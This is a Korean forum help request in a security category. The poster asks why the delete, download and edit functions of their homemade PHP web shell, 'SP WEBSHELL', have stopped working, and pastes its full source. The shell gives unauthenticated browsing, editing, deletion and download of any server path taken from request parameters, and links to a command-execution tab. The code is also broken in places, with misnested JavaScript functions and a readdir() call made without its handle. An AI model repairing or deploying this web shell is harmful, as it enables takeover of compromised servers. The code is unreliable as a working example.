-
질문 & 답변
카테고리
-
세부 분야
보안
-
해결 여부
미해결
파일, 폴더 삭제, 파일다운로드, 파일 수정이 안됩니다.
22.10.15 08:35 작성 조회수 165
1
#원래 수정은 됬었어요
<?
header("Content-Type:text/html;charset=UTF-8");
$mode = $_REQUEST["mode"];
$path = $_REQUEST["path"];
$page = basename($_SERVER["PHP_SELF"]);
$fileName = $_GET["fileName"];
if(empty($path)){
$tempFileName = basename(__FILE__);
$tempPath = realpath(__FILE__);
$path = str_replace($tempFileName, "", $tempPath);
$path = str_replace("\\", "/", $path);
} else {
$path= realpath($path)."/";
$path = str_replace("\\", "/", $path);
}
#Mode Logic
if($mode == "fileCreate") {
if(empty($fileName)){
echo "<script>alert('Empty File Name.');history.back(-1);</script>";
exit();
}
$fp = fopen($path.$fileName, "w");
fclose($fp);
echo "<script>location.href='{$page}?mode=fileBrowser&path={$path}'</script>";
} else if ($mode == "dirCreate") {
if(empty($fileName)){
echo "<script>alert('Empty Directory Name.');history.back(-1);</script>";
exit();
}
$dirPath = $path.$fileName;
if(is_dir($dirPath)) {
echo "<script>alert('Directory Already Exist.');history.back(-1);</script>";
exit();
}
mkdir($dirPath);
echo "<script>location.href='{$page}?mode=fileBrowser&path={$path}'</script>";
}else if ($mode == "fileModify" && !empty($_POST["fileContents"])) {
$filePath = $path.$fileName;
if(!file_exists(($filePath))) {
echo "<script>alert('No File.');history.back(-1);</script>";
exit();
}
$fileContents = $_POST["fileContents"];
$fp = fopen($filePath, "w");
fputs($fp, $fileContents, strlen($fileContents));
fclose($fp);
echo "<script>location.href='{$page}?mode=fileBrowser&path={$path}'</script>";
} else if ($mode == "fileDelete") {
if(empty($fileName)){
echo "<script>alert('Empty file name');history.back(-1);</script>";
exit();
}
$filePath = $path.$fileName;
if(!file_exists(($filePath))) {
echo "<script>alert('No File.');history.back(-1);</script>";
exit();
}
if(!unlink($filePath)){
echo "<script>alert('Fail To Delete File');history.back(-1);</script>";
exit();
}
echo "<script>location.href='{$page}?mode=fileBrowser&path={$path}'</script>";
#######################################################################
} else if ($mode == "dirDelete") {
if(empty($fileName)) {
echo "<script>alert('No File.');history.back(-1);;</script>";
exit();
}
$dirPath = $path.$fileName;
if(!is_dir($dirPath)) {
echo "<script>alert('No Directory.');history.back(-1);</script>";
}
if(!rmdir($dirPath)) {
echo "<script>alert('Fail To Delete Directory');history.back(-1);</script>";
exit();
}
echo "<script>location.href='{$page}?mode=fileBrowser&path={$path}'</script>";
} else if ($mode == "fileDownload") {
if(empty($fileName)) {
echo "<script>alert('No File.');history.back(-1);;</script>";
exit();
}
$filePath = $path.$fileName;
if(!file_exists(($filePath))) {
echo "<script>alert('No File.');history.back(-1);</script>";
exit();
}
header("Content-Type:application/octet-stream");
header("Content-Disposition:attachment; fileName=\"{$fileName}\"");
header("Content-Transfer-Encoding:binary");
readfile($filePath);
exit();
}
#Dir list return function
function getDirList($getPath) {
$listArr = array();
$handler = opendir($getPath);
while($file = readdir()) {
if(is_dir($getPath.$file) == "1") {
$listArr[] = $file;
}
}
closedir($handler);
return $listArr;
}
#File List Return Function
function getFileList($getPath) {
$listArr = array();
$handler = opendir($getPath);
while($file = readdir()) {
if(is_dir($getPath.$file) != "1") {
$listArr[] = $file;
}
}
closedir($handler);
return $listArr;
}
?>
<!DOCTYPE html>
<html lang="ko">
<head>
<title>SP WEBSHELL1.0.1</title>
<!-- 합쳐지고 최소화된 최신 CSS -->
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.2/css/bootstrap.min.css">
<!-- 부가적인 테마 -->
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.2/css/bootstrap-theme.min.css">
<!-- 합쳐지고 최소화된 최신 자바스크립트 -->
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.2/js/bootstrap.min.js"></script>
<script>
function fileCreate() {
var fileName = frm.createFileName.value;
if(!fileName){
alert("Please Input File Name.");
return;
}
location.href = "<?=$page?>?mode=fileCreate&path=<?=$path?>&fileName=" + fileName;
}
function dirCreate() {
var fileName = frm.createFileName.value;
if(!fileName){
alert("Please Input Directory Name.");
return;
}
location.href = "<?=$page?>?mode=dirCreate&path=<?=$path?>&fileName=" + fileName;
}
function fileModify(fileName) {
location.href = "<?=$page?>?mode=fileModify&path=<?=$path?>&fileName=" + fileName;
function dirDelete(fileName) {
if(confirm("Will you delete this directory? :" + fileName) == true){
location.href = "<?=$page?>?mode=dirDelete&path=<?=$path?>&fileName=" + fileName;
}
}
function fileDelete(fileName) {
if(confirm("Will you delete this file? :" + fileName) == true){
location.href = "<?=$page?>?mode=fileDelete&path=<?=$path?>&fileName=" + fileName;
}
}
}
function fileDownload(fileName) {
location.href = "<?=$page?>?mode=fileDownload&path=<?=$path?>&fileName=" + fileName;
</script>
</head>
<body>
<div class="container-fluid">
<div class="row">
<div class="col-md-3"></div>
<div class="col-md-6">
<h3>SP WEBSHELL ver 1.0.3</h3>
<hr>
<ul class="nav nav-tabs">
<li role="presentation" <? if(empty($mode) || $mode == "fileBrowser") echo "class=\active\"";?>><a href="<?=$page?>?mode=fileBrowser">File Browser</a></li>
<li role="presentation"><a href="<?=$page?>?mode=fileUpload">File Upload</a></li>
<li role="presentation" <? if($mode == "fileUpload") echo "class=\active\"";?>><a href="<?=$page?>?mode=command">Command Excution</a></li>
<li role="presentation" <? if($mode == "logout") echo "class=\active\"";?>><a href="<?=$page?>?mode=logout">Logout</a></li>
</ul>
<br>
<? if(empty($mode) || $mode == "fileBrowser") { ?>
<form action="<?=$page?>?mode=fileBrowser" method="GET">
<div class="input-group">
<span class="input-group-addon">Current Path</span>
<input type="text" class="form-control" placeholder="Path_Input" name="path" value="<?=$path?>">
<span class="input-group-btn">
<button class="btn btn-default" type="submit">Move</button>
</span>
</div>
</form>
<hr>
<div class="table-responsive">
<table class="table table-bordered table-hover"style="table-layout: fixed; word-break: break-all;">
<thead>
<tr class="active">
<th style="width: 50%"class="text-center">Name</th>
<th style="width: 14%" class="text-center">Type</th>
<th style="width: 18%" class="text-center">Date</th>
<th style="width: 18%" class="text-center">Action</th>
</tr>
</thead>
<tbody>
<?
$dirList = getDirList($path);
for($i=0; $i<count($dirList); $i++) {
if($dirList[$i] !=".") {
$dirDate= date("Y-m-d H:i", filemtime($path.$dirList[$i]));
?>
<tr>
<td style="vertical-align: middle"><span class="glyphicon glyphicon-folder-open" aria-hidden="true"></span><b> <a href="<?=$page?>?mode=fileBrowser&path=<?=$path?><?=$dirList[$i]?>"><?=$dirList[$i]?></a></b></td>
<td style="vertical-align: middle" class="text-center"><kbd>Directory</kbd></td>
<td style="vertical-align: middle" class="text-center"><?=$dirDate?></td>
<td style="vertical-align: middle" class="text-center">
<? if($dirList[$i] !="..") {?>
<div class="btn-group btn-group-sm" role="group" aria-label="...">
<button type="button" class="btn btn-danger" title="Directory Delete" onclick="dirDelete('<?=$dirList[$i]?>')"><span class="glyphicon glyphicon-trash" aria-hidden="true"></span></button>
<? }?>
</div>
</td>
</tr>
<?
}
}
?>
<?
$fileList = getFileList($path);
for($i=0; $i<count($fileList); $i++) {
$fileDate= date("Y-m-d H:i", filemtime($path.$fileList[$i]));
?>
<tr>
<td style="vertical-align: middle"><span class="glyphicon glyphicon-file" aria-hidden="true"></span> <?=$fileList[$i]?></td>
<td style="vertical-align: middle" class="text-center"><kbd>File</kbd></td>
<td style="vertical-align: middle" class="text-center"><?=$fileDate?></td>
<td style="vertical-align: middle" class="text-center">
<div class="btn-group btn-group-sm" role="group" aria-label="...">
<button type="button" class="btn btn-info" title="File Download" onclick="fileDownload('<?=$fileList[$i]?>')"><span class="glyphicon glyphicon-save" aria-hidden="true"></span></button>
<button type="button" class="btn btn-warning" title="File Modify" onclick="fileModify('<?=$fileList[$i]?>')"><span class="glyphicon glyphicon-wrench" aria-hidden="true"></span></button>
<button type="button" class="btn btn-danger" title="File Delete" onclick="fileDelete('<?=$fileList[$i]?>')"><span class="glyphicon glyphicon-trash" aria-hidden="true"></span></button>
</div>
</td>
</tr>
<? } ?>
</tbody>
</table>
</div>
<hr>
<form name="frm">
<div class="input-group">
<input type="text" class="form-control" placeholder="File/Directroy Name Input..." name="createFileName">
<span class="input-group-btn">
<button class="btn btn-default" type="button" onclick="fileCreate()">File Create</button>
<button class="btn btn-default" type="button" onclick="dirCreate()">Directory Create</button>
</span>
</div>
</form>
<? } else if($mode == "fileModify") { ?>
<?
if(empty($fileName)) {
echo"<script>alert('No File.');history.back(-1);</script";
exit();
}
$filePath = $path.$fileName;
if(!file_exists($filePath)){
echo"<script>alert('No File.');history.back(-1);</script";
exit();
}
$fp = fopen($filePath, "r");
$fileContents = fread($fp, filesize($filePath));
fclose($fp);
?>
<form action="<?=$page?>?mode=fileModify&path=<?$path?>&fileName=<?=$fileName?>" method="POST">
<div class="input-group">
<input type="text" class="form-control" value="<?=$path?><?=$fileName?>">
<span class="input-group-btn">
<button class="btn btn-default" type="submit">File Modify</button>
</span>
</div>
<textarea class="form-control" rows="20" name="fileContents"><?=htmlspecialchars($fileContents)?></textarea>
</form>
<br>
<p class="text-center"><button class="btn btn-default" type="button" onclick="history.back(-1)">Back</button></p>
<? } ?>
<hr>
<p class="text-muted text-center">Made by SPACEPIG#1747</p>
<div class="col-md-3"></div>
</div>
</div>
</body>
</html>
답변을 작성해보세요.
0
답변 1